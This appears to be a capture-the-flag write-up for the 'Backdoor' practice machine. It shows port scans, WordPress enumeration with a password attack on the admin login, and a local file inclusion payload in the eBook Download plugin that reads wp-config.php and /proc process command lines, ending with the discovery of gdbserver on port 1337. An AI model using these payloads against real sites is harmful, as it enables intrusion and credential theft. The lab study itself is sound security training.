๐ Table of Contents
$ sudo rustscan -b 8192 -u 16384 -a 10.10.11.125 -- -sS -sV -sC -oN 10.10.11.125.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Sun Dec 19 01:14:47 2021 as: nmap -vvv -p 22,80,1337 -sS -sV -sC -oN 10.10.11.125.backdoor.nmap.txt 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up, received echo-reply ttl 63 (0.082s latency).
Scanned at 2021-12-19 01:14:48 PST for 20s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqz2EAb2SBSzEIxcu+9dzgUZzDJGdCFWjwuxjhwtpq3sGiUQ1jgwf7h5BE+AlYhSX0oqoOLPKA/QHLxvJ9sYz0ijBL7aEJU8tYHchYMCMu0e8a71p3UGirTjn2tBVe3RSCo/XRQOM/ztrBzlqlKHcqMpttqJHphVA0/1dP7uoLCJlAOOWnW0K311DXkxfOiKRc2izbgfgimMDR4T1C17/oh9355TBgGGg2F7AooUpdtsahsiFItCRkvVB1G7DQiGqRTWsFaKBkHPVMQFaLEm5DK9H7PRwE+UYCah/Wp95NkwWj3u3H93p4V2y0Y6kdjF/L+BRmB44XZXm2Vu7BN0ouuT1SP3zu8YUe3FHshFIml7Ac/8zL1twLpnQ9Hv8KXnNKPoHgrU+sh35cd0JbCqyPFG5yziL8smr7Q4z9/XeATKzL4bcjG87sGtZMtB8alQS7yFA6wmqyWqLFQ4rpi2S0CoslyQnighQSwNaWuBYXvOLi6AsgckJLS44L8LxU4J8=
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
| 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open waste? syn-ack ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Dec 19 01:15:08 2021 -- 1 IP address (1 host up) scanned in 20.55 seconds
| Port | Service | Enumerated? |
|---|---|---|
| 22 | OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 | โ |
| 80 | Apache httpd 2.4.41 | โ |
| 1337 | Whatโs this?? |
Digging around the web server on port 80 we can tell itโs running WordPress so letโs run wpscan to enumerate themes, users, and plugins.
$ wpscan --url <http://10.10.11.125> -e ap,at,tt,cb,dbe,u,m --update --plugins-detection aggressive --plugins-version-detection aggressive -P /usr/share/wordlists/rockyou.txt -U admin
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ยฎ
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: <http://10.10.11.125/> [10.10.11.125]
[+] Started: Sun Dec 19 01:34:53 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://10.10.11.125/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://10.10.11.125/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://10.10.11.125/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://10.10.11.125/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - <http://10.10.11.125/index.php/feed/>, <generator><https://wordpress.org/?v=5.8.1></generator>
| - <http://10.10.11.125/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.8.1></generator>
[+] WordPress theme in use: twentyseventeen
| Location: <http://10.10.11.125/wp-content/themes/twentyseventeen/>
| Latest Version: 2.8 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: <http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt>
| Style URL: <http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208>
| Style Name: Twenty Seventeen
| Style URI: <https://wordpress.org/themes/twentyseventeen/>
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208>, Match: 'Version: 2.8'
[+] Enumerating All Plugins (via Aggressive Methods)
| Checking Known Locations -: |=====================|
[+] Checking Plugin Versions (via Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: <http://10.10.11.125/wp-content/plugins/akismet/>
| Latest Version: 4.2.1
| Last Updated: 2021-10-01T18:28:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - <http://10.10.11.125/wp-content/plugins/akismet/>, status: 403
|
| The version could not be determined.
[+] ebook-download
| Location: <http://10.10.11.125/wp-content/plugins/ebook-download/>
| Last Updated: 2020-03-12T12:52:00.000Z
| Readme: <http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt>
| [!] The version is out of date, the latest version is 1.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - <http://10.10.11.125/wp-content/plugins/ebook-download/>, status: 200
|
| Version: 1.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt>
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - <http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt>
[+] Enumerating All Themes (via Passive and Aggressive Methods)
| Checking Known Locations -: |====================================|
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentynineteen
| Location: <http://10.10.11.125/wp-content/themes/twentynineteen/>
| Latest Version: 2.1 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: <http://10.10.11.125/wp-content/themes/twentynineteen/readme.txt>
| Style URL: <http://10.10.11.125/wp-content/themes/twentynineteen/style.css>
| Style Name: Twenty Nineteen
| Style URI: <https://wordpress.org/themes/twentynineteen/>
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Known Locations (Aggressive Detection)
| - <http://10.10.11.125/wp-content/themes/twentynineteen/>, status: 500
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://10.10.11.125/wp-content/themes/twentynineteen/style.css>, Match: 'Version: 2.1'
[+] twentyseventeen
| Location: <http://10.10.11.125/wp-content/themes/twentyseventeen/>
| Latest Version: 2.8 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: <http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt>
| Style URL: <http://10.10.11.125/wp-content/themes/twentyseventeen/style.css>
| Style Name: Twenty Seventeen
| Style URI: <https://wordpress.org/themes/twentyseventeen/>
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - <http://10.10.11.125/wp-content/themes/twentyseventeen/>, status: 500
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://10.10.11.125/wp-content/themes/twentyseventeen/style.css>, Match: 'Version: 2.8'
[+] twentytwenty
| Location: <http://10.10.11.125/wp-content/themes/twentytwenty/>
| Latest Version: 1.8 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: <http://10.10.11.125/wp-content/themes/twentytwenty/readme.txt>
| Style URL: <http://10.10.11.125/wp-content/themes/twentytwenty/style.css>
| Style Name: Twenty Twenty
| Style URI: <https://wordpress.org/themes/twentytwenty/>
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Known Locations (Aggressive Detection)
| - <http://10.10.11.125/wp-content/themes/twentytwenty/>, status: 500
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://10.10.11.125/wp-content/themes/twentytwenty/style.css>, Match: 'Version: 1.8'
[+] twentytwentyone
| Location: <http://10.10.11.125/wp-content/themes/twentytwentyone/>
| Latest Version: 1.4 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: <http://10.10.11.125/wp-content/themes/twentytwentyone/readme.txt>
| Style URL: <http://10.10.11.125/wp-content/themes/twentytwentyone/style.css>
| Style Name: Twenty Twenty-One
| Style URI: <https://wordpress.org/themes/twentytwentyone/>
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Known Locations (Aggressive Detection)
| - <http://10.10.11.125/wp-content/themes/twentytwentyone/>, status: 500
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://10.10.11.125/wp-content/themes/twentytwentyone/style.css>, Match: 'Version: 1.4'
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations -: |====================================================================================================================================================================================|
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -: |=====================================================================================================================================================================================|
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports -: |=========================================================================================================================================================================================|
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs -: |================================================================================================================================================================================|
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs -: |====================================================================================================================================================================================|
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - <http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 1 user/s
Progress: |
Progress: |
The eBook Download plugin was quickly identified as a vulnerable plugin.
Look in searchsploit we find an example LFI to use:
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
In the wp-config.php file we find a username wordpressuser and a password. This turned out to be largely useless.
However, we can continue to use the LFI to figure out what else is running on the system. Of particular interest is what is running on port 1337 because so far we have not been able to interact with the service via curl or netcat in any meaningful way.
Since we have LFI we can use that to inspect the various processes running on the system and try to figure out what might be listening on port 1337.
Here I use ffuf to receive the numbers 1-2000 from stdin as the word list input to -w and I also regex match on :1337 with -mr and we check all processes on the filesystem via /proc/FUZZ/cmdline.
$ seq 1 2000 | ffuf -mr ':1337' -w - -u '<http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline>'
________________________________________________
:: Method : GET
:: URL : <http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline>
:: Wordlist : FUZZ: -
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Regexp: :1337
________________________________________________
813 [Status: 200, Size: 181, Words: 11, Lines: 1]
815 [Status: 200, Size: 148, Words: 5, Lines: 1]
864 [Status: 200, Size: 145, Words: 5, Lines: 1]
865 [Status: 200, Size: 122, Words: 1, Lines: 1]
:: Progress: [1500/1500] :: Job [1/1] :: 250 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
ffuf helpfully shows us that PID 813 has :1337 in its command line so lets use our previous LFI to see what that PID is:
$ curl -o- '<http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/813/cmdline>'
/proc/813/cmdline/proc/813/cmdline/proc/813/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>